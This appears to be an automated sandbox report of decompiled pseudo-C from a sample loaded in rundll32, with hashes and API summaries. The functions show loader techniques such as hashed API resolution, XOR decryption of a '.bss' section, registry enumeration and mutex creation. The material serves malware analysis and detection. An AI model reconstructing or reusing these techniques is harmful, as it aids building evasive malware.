                                • Opcode ID: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction ID: 54cb198ecbd0fb5da84fc14fef4d7b92d0124b8b65483e6b8917e8781eecb553
                                • Opcode Fuzzy Hash: 0ed388b5329a4180b2c24342a2badd19053e0c758b32aa678527091eff390745
                                • Instruction Fuzzy Hash: 4721F531209B5081EB99DB7AE5803AD63B1FF89B84F685615DE4D537AACF28C8C1C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                C-Code - Quality: 41%
                                			E00000201201A29A37E0(long long* __rax, long long __rcx, void* __r9) {
                                				void* __rbx;
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t80;
                                				void* _t83;
                                				void* _t84;
                                				void* _t100;
                                				void* _t176;
                                				long long* _t222;
                                				long long* _t223;
                                				long long* _t224;
                                				long long _t225;
                                				intOrPtr _t226;
                                				long long* _t228;
                                				long long* _t229;
                                				void* _t230;
                                				void* _t288;
                                				long long _t289;
                                				void* _t291;
                                				void* _t294;
                                				intOrPtr _t295;
                                				intOrPtr _t296;
                                				void* _t300;
                                				void* _t301;
                                				void* _t303;
                                				void* _t310;
                                				void* _t313;
                                				long long _t314;
                                				void* _t315;
                                				void* _t316;
                                				long long _t319;
                                				long long* _t320;
                                				void* _t322;
                                				CHAR* _t327;
                                
                                				_t222 = __rax;
                                				 *((long long*)(_t300 + 8)) = __rcx;
                                				_t301 = _t300 - 0x248;
                                				_t292 =  *0xa29ad458;
                                				_t295 =  *((intOrPtr*)( *0xa29ad458 + 8));
                                				 *((long long*)(_t301 + 0x20)) =  *0xa29ad448;
                                				 *(_t301 + 0x298) =  *0xa29ad450;
                                				GetModuleHandleA(_t327);
                                				_t80 = E00000201201A29A40F8(__rax,  *0xa29ad458 + 0x18, _t303, _t313, _t322, _t319);
                                				r13d = 0;
                                				if (_t80 != r13d) goto 0xa29a38bf;
                                				E00000201201A29A908C(0xa30cd0f3, _t222,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
                                				if (_t222 == _t319) goto 0xa29a3866;
                                				 *_t222();
                                				goto 0xa29a3869;
                                				_t223 = _t319;
                                				_t83 = E00000201201A29A40F8(_t223, _t292 + 0x10, _t303, _t313, _t316, _t288); // executed
                                				if (_t83 != r13d) goto 0xa29a38bf;
                                				_t84 = E00000201201A29A5FC8(_t223, _t230,  *0xa29ad448 + 0x201a29b1082, _t292 + 0x28, _t292, _t295, _t291, _t294); // executed
                                				if (_t84 != r13d) goto 0xa29a38bf;
                                				if (E00000201201A29A5FC8(_t223, _t230,  *0xa29ad448 + 0x201a29b1079, _t292 + 0x20, _t292, _t295) != r13d) goto 0xa29a38bf;
                                				if (E00000201201A29A5FC8(_t223, _t230,  *0xa29ad448 + 0x201a29b1092, _t292 + 0x30, _t292, _t295) != r13d) goto 0xa29a3cc0;
                                				HeapAlloc(??, ??, ??);
                                				_t289 = _t223;
                                				if (_t223 == _t319) goto 0xa29a3cbb;
                                				E00000201201A29A487A();
                                				E00000201201A29A908C(0x9ffc4c27, _t223,  *((intOrPtr*)(_t292 + 0x10)));
                                				if (_t223 == _t319) goto 0xa29a390d;
                                				 *_t223();
                                				_t24 = _t289 + 0xa8; // 0xa8
                                				_t224 = _t24;
                                				 *_t224 = _t224;
                                				 *((long long*)(_t289 + 0xb0)) = _t224;
                                				 *(_t289 + 0x9c) = r13d;
                                				 *(_t289 + 0xa0) = r13d;
                                				 *(_t289 + 0x98) = r13d;
                                				E00000201201A29A638C(_t224, _t230, _t292, _t230);
                                				E00000201201A29A908C(0xdc444c2b, _t224,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t224 == _t319) goto 0xa29a395e;
                                				r9d = 0;
                                				r8d = 0;
                                				 *_t224();
                                				goto 0xa29a3961;
                                				_t225 = _t319;
                                				 *((long long*)(_t289 + 0x28)) = _t225;
                                				if (_t225 != _t319) goto 0xa29a398e;
                                				E00000201201A29A908C(0xc06f8334, _t225,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t225 == _t319) goto 0xa29a3984;
                                				 *_t225();
                                				goto 0xa29a3caa;
                                				goto 0xa29a3cac;
                                				r8d = 0x1102;
                                				HeapAlloc(??, ??, ??);
                                				_t320 = _t225;
                                				_t34 = _t295 + 0x7f; // 0x7f
                                				r12d = _t34;
                                				if (_t225 == _t295) goto 0xa29a3a8e;
                                				 *_t225 = 0;
                                				E00000201201A29A908C(0x3d06c463, _t225,  *((intOrPtr*)( *0xa29ad458 + 0x20)));
                                				if (_t225 == _t295) goto 0xa29a39fb;
                                				RegOpenKeyW(??, ??, ??); // executed
                                				goto 0xa29a39fe;
                                				if (r12d != 0) goto 0xa29a3a7e;
                                				E00000201201A29A908C(0xdf514773, _t225,  *((intOrPtr*)( *0xa29ad458 + 0x20)));
                                				if (_t225 == 0) goto 0xa29a3a30;
                                				r9d = 0x104;
                                				RegEnumKeyW(??, ??, ??, ??); // executed
                                				goto 0xa29a3a33;
                                				if (r12d != 0) goto 0xa29a3a4c;
                                				_t100 = E00000201201A29A6644(_t225, _t230, _t320, _t301 + 0x30, _t292, _t301 + 0x30, _t313);
                                				if (_t100 == 0) goto 0xa29a3a02;
                                				if (_t100 != 0x103) goto 0xa29a3a5d;
                                				 *0xa29ad438 = _t320;
                                				E00000201201A29A908C(0xbba3b4b6, _t225,  *((intOrPtr*)( *0xa29ad458 + 0x20)));
                                				if (_t225 == 0) goto 0xa29a3a7a;
                                				RegCloseKey(??); // executed
                                				if (0 == 0) goto 0xa29a3a93;
                                				HeapFree(??, ??, ??);
                                				goto 0xa29a3a93;
                                				r13d = 0;
                                				if (8 != r13d) goto 0xa29a3cb1;
                                				_t296 =  *0xa29ad448;
                                				_t47 = _t320 + 8; // 0x8
                                				r8d = _t47;
                                				0xa29a47b0();
                                				 *((intOrPtr*)(_t301 + 0x2a6)) = r13w;
                                				if (E00000201201A29AA0AC(8, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, 0x201a29a0000 + _t296 + 0x11188) == r13d) goto 0xa29a3b05;
                                				_t310 = 0x201a29a0000 + _t296 + 0x111e0;
                                				if (E00000201201A29AA0AC(_t104, 0, _t230, _t289, _t301 + 0x2a0, _t289, _t292, _t296, _t310) != r13d) goto 0xa29a3cb1;
                                				_t57 = _t289 + 8; // 0x8
                                				_t286 = _t57;
                                				if (E00000201201A29A5058(_t225, _t230, _t289, _t57, _t292, _t296) != r13d) goto 0xa29a3b4b;
                                				E00000201201A29A405C(_t230, _t289, _t57, _t289, _t292, _t296);
                                				 *((long long*)(_t289 + 0x30)) = _t225;
                                				if (_t225 == _t320) goto 0xa29a3b4b;
                                				_t59 = _t289 + 8; // 0x8
                                				E00000201201A29A405C(_t230, _t59, _t57, _t289, _t292, _t296);
                                				 *((long long*)(_t289 + 0x38)) = _t225;
                                				_t144 =  !=  ? r13d : 8;
                                				_t207 = ( !=  ? r13d : 8) - r13d;
                                				if (( !=  ? r13d : 8) != r13d) goto 0xa29a3cb1;
                                				if (E00000201201A29AA7A0(_t176, _t225, _t230, _t289, _t286, __r9) != r13d) goto 0xa29a3b6b;
                                				goto 0xa29a3cb1;
                                				_t226 =  *((intOrPtr*)(_t301 + 0x20));
                                				r9d =  *(_t301 + 0x298);
                                				_t314 = _t226 + 0x201a29af000;
                                				r8d =  *(_t314 + 2) & 0x0000ffff;
                                				if (_t226 - _t310 + 8 <= 0) goto 0xa29a3baf;
                                				if ((r9d ^ 0xe49a1e6d) == r13d) goto 0xa29a3bb2;
                                				E00000201201A29A4D70(r9d ^ 0xe49a1e6d, _t310 + _t314 + 8);
                                				goto 0xa29a3bb2;
                                				_t228 = _t320;
                                				if (_t228 != _t320) goto 0xa29a3bc1;
                                				goto 0xa29a3cb1;
                                				r9d = r9d ^ 0xecb028fc;
                                				E00000201201A29AA8E8(r9d, _t228, _t314, __r9);
                                				if (_t228 == _t320) goto 0xa29a3bb7;
                                				 *((long long*)(_t289 + 0x40)) = _t314;
                                				 *0xa29ad440 = _t289;
                                				E00000201201A29A908C(0xa30cd0f3, _t228,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t228 == _t320) goto 0xa29a3bfc;
                                				 *_t228();
                                				goto 0xa29a3bff;
                                				_t229 = _t320;
                                				if (_t229 ==  *((intOrPtr*)(_t301 + 0x290))) goto 0xa29a3c9d;
                                				E00000201201A29A908C(0x9f72cbe0, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t229 == _t320) goto 0xa29a3c26;
                                				 *_t229();
                                				goto 0xa29a3c29;
                                				E00000201201A29A908C(0xaade337c, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t229 == _t320) goto 0xa29a3c4b;
                                				r8d = r13d;
                                				 *_t229();
                                				goto 0xa29a3c4e;
                                				if (_t320 != _t320) goto 0xa29a3c6f;
                                				E00000201201A29A908C(0xc06f8334, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t229 != _t320) goto 0xa29a397d;
                                				goto 0xa29a3cac;
                                				E00000201201A29A908C(0x1c8cff93, _t229,  *((intOrPtr*)(_t292 + 0x18)));
                                				if (_t229 == _t320) goto 0xa29a3c8f;
                                				 *_t229();
                                				goto 0xa29a3c92;
                                				if (r13d != r13d) goto 0xa29a3cc0;
                                				goto 0xa29a3c57;
                                				asm("lock add dword [esi+0x38], 0x1");
                                				if (E00000201201A29A9D6C(r12d, 0x1c8cff93, _t230, _t289, _t320, _t289, __r9, _t314, _t315) == r13d) goto 0xa29a3cc0;
                                				E00000201201A29A6CE4(_t229, _t230, _t289, _t320, _t292);
                                				goto 0xa29a3cc0;
                                				return 8;
                                			}







































                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Alloc$CloseEnumErrorFreeHandleLastModuleOpen
                                • String ID:
                                • API String ID: 2248784776-0
                                • Opcode ID: 92d77bb05cadc40fcac066ca41b522769a1026bec4031250602ee8567609c9a5
                                • Instruction ID: cb1fd0e742a42fbabd141426d10e2e4dd9e2c10633d0c03ec6019987861242a1
                                • Opcode Fuzzy Hash: 92d77bb05cadc40fcac066ca41b522769a1026bec4031250602ee8567609c9a5
                                • Instruction Fuzzy Hash: 92D19F2530277096EE68AB69E48D3AB6365F788F8CF704411DE4E47793DE78D4AAC304
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: File$CreateDirectoryErrorLastQuery
                                • String ID:
                                • API String ID: 2967190759-0
                                • Opcode ID: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction ID: 1e4000a7bd2e1a0f68ad0785df46c5dc3c71ca2925bf0b12b2061f7740d2c54d
                                • Opcode Fuzzy Hash: f814dd8b6d3da2fcbfd4e7d7d81ec7b5df8dd2866cc2a168341a68cf2791420f
                                • Instruction Fuzzy Hash: 9141A13230676097FF588B5AA58839A72A0F7CCBD4F284525DE5D43B86CF38D466C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 48%
                                			E00000201201A29A4DB4(long long __rbx, long long __rcx, long long __rdi, long long __rsi, void* __r9, void* __r11) {
                                				intOrPtr _t22;
                                				intOrPtr _t23;
                                				void* _t30;
                                				long long _t55;
                                				void* _t71;
                                				intOrPtr* _t74;
                                				intOrPtr* _t75;
                                				long long _t81;
                                				long long _t82;
                                				long long _t84;
                                				void* _t90;
                                				long _t92;
                                				long _t94;
                                				long _t96;
                                
                                				_t90 = __r9;
                                				_t55 = _t84;
                                				 *((long long*)(_t55 + 8)) = __rbx;
                                				 *((long long*)(_t55 + 0x10)) = _t81;
                                				 *((long long*)(_t55 + 0x18)) = __rsi;
                                				 *((long long*)(_t55 + 0x20)) = __rdi;
                                				_t82 = __rcx;
                                				r8d = 0;
                                				HeapCreate(_t96, _t94, _t92); // executed
                                				if (_t55 == 0) goto 0xa29a4f03;
                                				_t71 =  *((intOrPtr*)(__rcx + 0x3c)) + __rcx;
                                				_t74 = _t55 + _t71 + 0x68;
                                				_t22 =  *_t74;
                                				if (_t22 == 0) goto 0xa29a4e94;
                                				if (_t22 == 0x7373622e) goto 0xa29a4e22;
                                				_t75 = _t74 + 0x28;
                                				_t23 =  *_t75;
                                				if (_t23 != 0) goto 0xa29a4e11;
                                				if (_t23 == 0) goto 0xa29a4e94;
                                				r13d =  *(_t75 + 0x10);
                                				r12d =  *(_t75 + 0x14);
                                				r12d = r12d ^  *(_t71 + 8);
                                				r12d = r12d ^ r13d;
                                				HeapAlloc(??, ??, ??);
                                				if (_t55 == 0) goto 0xa29a4e8d;
                                				r9d = r12d;
                                				r8d = r13d;
                                				E00000201201A29A111C(_t55, _t55, __rbx, _t55, _t71 + __rcx);
                                				r11d =  *((intOrPtr*)(_t75 + 0xc));
                                				 *0xa29ad448 = _t55 - __r11 - _t82;
                                				 *0xa29ad450 = E00000201201A29A16FC(_t55, _t55 - __r11 - _t82 + 0xa29b1040);
                                				goto 0xa29a4e99;
                                				goto 0xa29a4e99;
                                				if (2 == 0) goto 0xa29a4ea8;
                                				HeapDestroy(??);
                                				goto 0xa29a4f03;
                                				HeapAlloc(??, ??, ??);
                                				if (0xa29b1040 != 0) goto 0xa29a4ee1;
                                				HeapDestroy(??);
                                				goto 0xa29a4f03;
                                				E00000201201A29A487A();
                                				 *0x201A29B1048 = _t55;
                                				 *0xa29ad458 = 0xa29b1040; // executed
                                				_t30 = E00000201201A29A37E0(0xa29b1040, _t82, _t90); // executed
                                				return _t30;
                                			}


















                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$AllocDestroy$Create
                                • String ID: .bss
                                • API String ID: 388876957-3890483948
                                • Opcode ID: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction ID: db4166cf2e94e52954ad366ba799a3e103ac906b36ac0189fdfba42a99be8011
                                • Opcode Fuzzy Hash: f2c7b615a138f4c90b95f00cc2a562d4e42a46c6d73442d59f831ff1248fe2d1
                                • Instruction Fuzzy Hash: C0416D2570276086EF1CCB5AA84831B77A0F789F98F349025DE4947B96DF38D8A6C300
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 29%
                                			E00000201201A29AA7A0(void* __edi, long long* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, void* __r9, long long _a8, char _a16, char _a24) {
                                				intOrPtr _v56;
                                				void* _v64;
                                				intOrPtr _v72;
                                				long long _v88;
                                				void* __rsi;
                                				void* __rbp;
                                				long long* _t58;
                                				long long* _t59;
                                				long long _t60;
                                				long long _t75;
                                				intOrPtr* _t87;
                                
                                				_t60 = __rbx;
                                				_t58 = __rax;
                                				_a8 = __rbx;
                                				_t76 =  *0xa29ad458;
                                				_t87 = __rcx;
                                				_v72 = 0x18;
                                				_v56 = 0;
                                				E00000201201A29A908C(0xe9f8f8df, __rax,  *((intOrPtr*)( *0xa29ad458 + 0x20)));
                                				if (_t58 == __rbx) goto 0xa29aa804;
                                				r9d = 0; // executed
                                				 *_t58(); // executed
                                				goto 0xa29aa806;
                                				if (0 == 0) goto 0xa29aa8d2;
                                				r9d = 0;
                                				_a16 =  *__rcx;
                                				_t59 =  &_a24;
                                				_v88 = _t59;
                                				E00000201201A29A1000(__edi, _t59, __rbx,  &_a16,  *0xa29ad458, 0x201a29a0000,  *0xa29ad448 + 0x201a29b1178);
                                				if (_t59 == _t60) goto 0xa29aa8d2;
                                				E00000201201A29A908C(0x3ff22481, _t59,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
                                				if (_t59 == _t60) goto 0xa29aa875;
                                				CreateMutexW(??, ??, ??); // executed
                                				goto 0xa29aa878;
                                				_t75 = _t60;
                                				if (_t75 == _t60) goto 0xa29aa8c4;
                                				E00000201201A29A908C(0xc06f8334, _t59,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
                                				if (_t59 == _t60) goto 0xa29aa894;
                                				 *_t59();
                                				goto 0xa29aa899;
                                				if (0x7f != 0xb7) goto 0xa29aa8ba;
                                				E00000201201A29A908C(0xa219a077, _t59,  *((intOrPtr*)(_t76 + 0x18)));
                                				if (_t59 == _t60) goto 0xa29aa8c4;
                                				FindCloseChangeNotification(??); // executed
                                				goto 0xa29aa8c4;
                                				 *((long long*)(_t87 + 0x18)) = _t75;
                                				HeapFree(??, ??, ??);
                                				return 1;
                                			}















                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: DescriptorSecurity$ChangeCloseConvertCreateErrorFindFreeHeapLastMutexNotificationString
                                • String ID:
                                • API String ID: 2727274001-0
                                • Opcode ID: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction ID: d3e9368ba4873339c505feadad2c77f2c08289a9bf92e84dc5601bbdde09a22c
                                • Opcode Fuzzy Hash: 094b80e17cbc27acdaa4bcb602713c3cf38535d7203a15ce1a2febed987810e0
                                • Instruction Fuzzy Hash: 253182327027A497EE68DF59E4483DB73A0F788B88F644421DA4D43786DE38D567C790
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: AllocHeap
                                • String ID:
                                • API String ID: 4292702814-0
                                • Opcode ID: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction ID: ec3aa1cd2b5154ab69fa9795f20524594849ff5dee19dbbb36490c536df1d910
                                • Opcode Fuzzy Hash: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                                • Instruction Fuzzy Hash: 2C516172705BA086DB68CF09F448B5F77A4F784B98F255115EE8943B95DB38C8A2CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 29%
                                			E00000201201A29A5FC8(long long* __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, void* _a24, long long _a32) {
                                				long long* _t32;
                                				long long* _t35;
                                				long long _t41;
                                				void* _t56;
                                				void* _t57;
                                
                                				_t32 = __rax;
                                				_a8 = __rbx;
                                				_a16 = __rbp;
                                				_a32 = __rsi;
                                				_t48 =  *0xa29ad458;
                                				E00000201201A29A908C(0x2d4b080e, __rax,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
                                				if (_t32 == 0) goto 0xa29a6006;
                                				LoadLibraryA(??); // executed
                                				_t35 = _t32;
                                				goto 0xa29a6008;
                                				if (_t35 == 0) goto 0xa29a6048;
                                				if (E00000201201A29A40F8(_t35,  &_a24, _t56, _t57) != 0) goto 0xa29a602e;
                                				_t41 = _a24;
                                				 *_t41 = _t35;
                                				 *__rdx = _t41;
                                				goto 0xa29a6066;
                                				E00000201201A29A908C(0xc8e2960c, _t32,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
                                				if (_t32 == 0) goto 0xa29a6066;
                                				 *_t32();
                                				goto 0xa29a6066;
                                				E00000201201A29A908C(0xc06f8334, _t32,  *((intOrPtr*)(_t48 + 0x18)));
                                				if (_t32 == 0) goto 0xa29a6061;
                                				 *_t32();
                                				goto 0xa29a6066;
                                				return 0x7f;
                                			}









                                APIs
                                  • Part of subcall function 00000201A29A908C: SetLastError.KERNEL32 ref: 00000201A29A90C8
                                • LoadLibraryA.KERNELBASE(?,?,00000000,00000201A29A8947,?,?,?,?,?,00000201A29A9D9C), ref: 00000201A29A5FFF
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: ErrorLastLibraryLoad
                                • String ID:
                                • API String ID: 3568775529-0
                                • Opcode ID: 99d26a6194f647cbc272d2d1eeaeaa4141e7c0158a623e847e66b8beeb9b8dfc
                                • Instruction ID: 033ccdc57664e71c366358e11bf6f1f8fa51d5e6c3cbb106bcf38b49f4c83d52
                                • Opcode Fuzzy Hash: 99d26a6194f647cbc272d2d1eeaeaa4141e7c0158a623e847e66b8beeb9b8dfc
                                • Instruction Fuzzy Hash: 7111602631777086FE689B5AA54626B6260A7CCFC4F3C4431DE4E47747DE38D9A2C320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 73%
                                			_entry_(void* __ecx, void* __edx, long long __rcx, void* __r8) {
                                				void* __rbx;
                                				void* _t2;
                                				long long* _t15;
                                				long long _t16;
                                				void* _t20;
                                				long long _t21;
                                				long long _t22;
                                				void* _t24;
                                				void* _t25;
                                
                                				_t17 = __rcx;
                                				if (__edx == 0) goto 0xa29a697b;
                                				if (__edx != 1) goto 0xa29a6998;
                                				_t20 = __r8; // executed
                                				_t2 = E00000201201A29A4DB4(_t16, __rcx, _t21, _t22, _t24, _t25); // executed
                                				if (_t2 == 0) goto 0xa29a6998;
                                				goto 0xa29a6998;
                                				E00000201201A29A6CE4(_t15, _t16, _t17, _t20, _t22);
                                				if ( *0xa29ad458 == 0) goto 0xa29a6998;
                                				HeapDestroy(??); // executed
                                				return 0;
                                			}













                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.358453986.00000201A29A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201A29A0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_201a29a0000_rundll32.jbxd
                                Similarity
                                • API ID: Heap$Destroy$AllocCreate
                                • String ID:
                                • API String ID: 3351204586-0
                                • Opcode ID: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction ID: dfb2634da5e58c25371bcb61734d2be7c2c63e119a504b9d24ca683d9490e512
                                • Opcode Fuzzy Hash: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                                • Instruction Fuzzy Hash: ADE01A5270336041FF6C5A6AC59D36B22A0ABC5F4CF785839CD4A4B3E7CE18E8A7C211
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Control-flow Graph

                                C-Code - Quality: 39%
                                			E00000201201A29A6DF0(long long __rbx, intOrPtr* __rcx, long long __rdx) {
                                				void* __rdi;
                                				void* __rsi;
                                				void* __rbp;
                                				void* _t96;
                                				void* _t116;
                                				void* _t121;
                                				intOrPtr _t123;
                                				void* _t130;
                                				char _t131;
                                				void* _t156;
                                				long long* _t198;
                                				long long* _t199;
                                				long long* _t201;
                                				char* _t218;
                                				char* _t219;
                                				long _t252;
                                				intOrPtr* _t253;
                                				long _t255;
                                				void* _t260;
                                				char* _t262;
                                				long long _t263;
                                				signed long long _t269;
                                				void* _t271;
                                				void* _t272;
                                				void* _t292;
                                				void* _t293;
                                				long _t300;
                                				long _t305;
                                				void* _t307;
                                
                                				_t292 = _t271;
                                				 *((long long*)(_t292 + 8)) = __rbx;
                                				 *((long long*)(_t292 + 0x10)) = __rdx;
                                				_t272 = _t271 - 0x40;
                                				r14d =  *0xa29ad450;
                                				_t253 = __rcx;
                                				 *((long long*)(_t272 + 0x38)) =  *((intOrPtr*)( *0xa29ad458 + 8));
                                				if (E00000201201A29A91C8(_t121, r14d ^ 0x55e7ce26,  *((intOrPtr*)( *0xa29ad458 + 8)), __rbx, __rdx, __rdx, __rcx, _t255, _t292 - 0x58, _t292 + 0x18, _t292) != 0) goto 0xa29a7239;
                                				_t198 =  *_t253;
                                				 *((long long*)(_t272 + 0x98)) = _t198;
                                				 *((long long*)(_t272 + 0x30)) =  *((intOrPtr*)( *0xa29ad458 + 8));
                                				if ( *((intOrPtr*)(_t272 + 0x20)) == 0) goto 0xa29a703b;
                                				r13d = 0xfb849f8f;
                                				E00000201201A29A908C(r13d, _t198,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
                                				if (_t198 == 0) goto 0xa29a6e8f;
                                				 *_t198();
                                				goto 0xa29a6e91;
                                				r8d = 1;
                                				HeapAlloc(_t307, _t305, _t300);
                                				 *((long long*)(_t272 + 0x28)) = _t198;
                                				if (_t198 == 0) goto 0xa29a722f;
                                				0xa29a47b0();
                                				_t262 = _t198;
                                				if ( *_t262 == 0x20) goto 0xa29a6edc;
                                				if ( *_t262 != 9) goto 0xa29a6ee1;
                                				_t263 = _t262 + 1;
                                				goto 0xa29a6ed0;
                                				if ( *_t263 == 0) goto 0xa29a6f74;
                                				E00000201201A29A908C(r13d, _t198,  *((intOrPtr*)( *0xa29ad458 + 0x18)));
                                				if (_t198 == 0) goto 0xa29a6f03;
                                				 *_t198();
                                				goto 0xa29a6f05;
                                				asm("cdq");
                                				_t15 = _t198 + 1; // 0x1
                                				r8d = _t15;
                                				HeapAlloc(_t293, _t252, _t255);
                                				if (_t198 == 0) goto 0xa29a6f76;
                                				_t130 =  *_t263;
                                				if (_t130 == 0) goto 0xa29a6f46;
                                				if (_t130 == 0x20) goto 0xa29a6f42;
                                				_t218 = _t263 + 1;
                                				_t131 =  *_t218;
                                				if (_t131 != 0) goto 0xa29a6f34;
                                				if (_t131 != 0) goto 0xa29a6f48;
                                				if (_t218 == 0) goto 0xa29a6f62;
                                				 *_t218 = 0;
                                				_t219 = _t218 + 1;
                                				if ( *_t219 == 0x20) goto 0xa29a6f5d;
                                				if ( *_t219 != 9) goto 0xa29a6f62;
                                				goto 0xa29a6f53;
                                				 *_t198 = _t263;
                                				_t199 = _t198 +  *((intOrPtr*)( *0xa29ad458 + 8));
                                				if (_t219 + 1 != 0) goto 0xa29a6f2a;
                                				goto 0xa29a6f7e;
                                				if (0 == 0) goto 0xa29a7021;
                                				E00000201201A29A908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0xa29ad458 + 0x10)));
                                				if (_t199 == 0) goto 0xa29a6fa8;
                                				 *_t199();
                                				 *((long long*)(_t253 + 0x40)) =  *((intOrPtr*)(_t272 + 0x28));
                                				 *((long long*)(_t253 + 0x48)) =  *((intOrPtr*)(_t272 + 0x90));
                                				 *((intOrPtr*)(_t253 + 0x50)) = sil;
                                				if ( *((char*)(_t253 + 0x70)) == 0) goto 0xa29a6fcb;
                                				 *((char*)(_t253 + 0x70)) = 0;
                                				asm("lock and dword [edi+0x2c], 0xfffffffe");
                                				E00000201201A29A908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0xa29ad458 + 0x10)));
                                				if (_t199 == 0) goto 0xa29a6fea;
                                				 *_t199();
                                				if ( *((intOrPtr*)(_t253 + 0x40)) == 0) goto 0xa29a7010;
                                				HeapFree(_t260, ??);
                                				HeapFree(??, ??, ??);
                                				goto 0xa29a7040;
                                				HeapFree(??, ??, ??);
                                				HeapFree(??, ??, ??);
                                				if (0x57 != 0) goto 0xa29a723e;
                                				if (E00000201201A29A91C8(0, r14d ^ 0x881e33f6, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0xa29a7239;
                                				_t96 = E00000201201A29A672C( *((intOrPtr*)(_t272 + 0x20)),  *((intOrPtr*)(_t272 + 0x20)), _t272 + 0x98);
                                				_t123 =  *((intOrPtr*)(_t272 + 0x98));
                                				if (_t96 != 0) goto 0xa29a70a8;
                                				if (_t123 == 0) goto 0xa29a7239;
                                				 *((intOrPtr*)(_t253 + 0x28)) = _t123;
                                				if (E00000201201A29A91C8(_t123, r14d ^ 0xa2dd2342, _t199,  *((intOrPtr*)(_t272 + 0x30)),  *((intOrPtr*)(_t272 + 0x88)),  *((intOrPtr*)(_t272 + 0x20)), _t253, _t198, _t272 + 0x20, _t272 + 0x90, _t292) != 0) goto 0xa29a7166;
                                				_t46 = _t199 + 0x10; // 0x10
                                				_t116 = _t46;
                                				_t156 =  <  ?  *((void*)(_t272 + 0x90)) : _t116;
                                				E00000201201A29A908C(0x4a75e5e7, _t199,  *((intOrPtr*)( *0xa29ad458 + 0x10)));
                                				if (_t199 == 0) goto 0xa29a7109;
                                				 *_t199();
                                				r8d = _t156;
                                				0xa29a47b0();
                                				if (_t156 - _t116 >= 0) goto 0xa29a7134;
                                				r8d = _t116 - _t156;
                                				E00000201201A29A487A();
                                				E00000201201A29A908C(0x8d72aad2, _t199,  *((intOrPtr*)( *0xa29ad458 + 0x10)));
